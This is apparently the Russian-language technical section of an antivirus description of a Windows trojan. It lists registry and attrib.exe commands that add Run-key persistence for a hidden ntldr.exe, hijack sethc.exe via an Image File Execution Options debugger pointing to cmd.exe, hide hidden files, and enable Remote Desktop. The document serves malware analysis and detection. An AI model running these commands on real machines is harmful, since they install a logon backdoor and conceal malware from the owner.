Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'debugger' = 'c:\ntldr.exe'
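- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] 'debugger' = '<SYSTEM32>\cmd.exe' (подмена отладчика для sethc.exe: вместо обработчика «залипания клавиш» запускается cmd.exe; при проверке системы параметр debugger в этом ключе должен отсутствовать)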
- <SYSTEM32>\sethc.exe
- Блокирует отображение скрытых файлов (параметры Hidden и SHOWALL\CheckedValue в командах reg.exe ниже)
- <SYSTEM32>\attrib.exe +h +r c:\ntldr.exe
- <SYSTEM32>\reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /f /t REG_DWORD /d 0
- <SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v debugger /t REG_SZ /f /d c:\ntldr.exe
- <SYSTEM32>\attrib.exe +h +r <SYSTEM32>\ntldr.exe
- <SYSTEM32>\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /f /t REG_DWORD /d 2
- <SYSTEM32>\attrib.exe +h <SYSTEM32>\GroupPolicy\Machine\Scripts\scripts.ini
- <SYSTEM32>\attrib.exe -h <SYSTEM32>\GroupPolicy\Machine\Scripts\scripts.ini
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /f /d 0 (значение 0 разрешает входящие подключения к удалённому рабочему столу)
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_SZ /f /d <SYSTEM32>\cmd.exe
- <SYSTEM32>\dllcache\sethc.exe.new
- <SYSTEM32>\ntldr.bat
- <SYSTEM32>\sethc
- ClassName: 'Shell_TrayWnd' WindowName: ''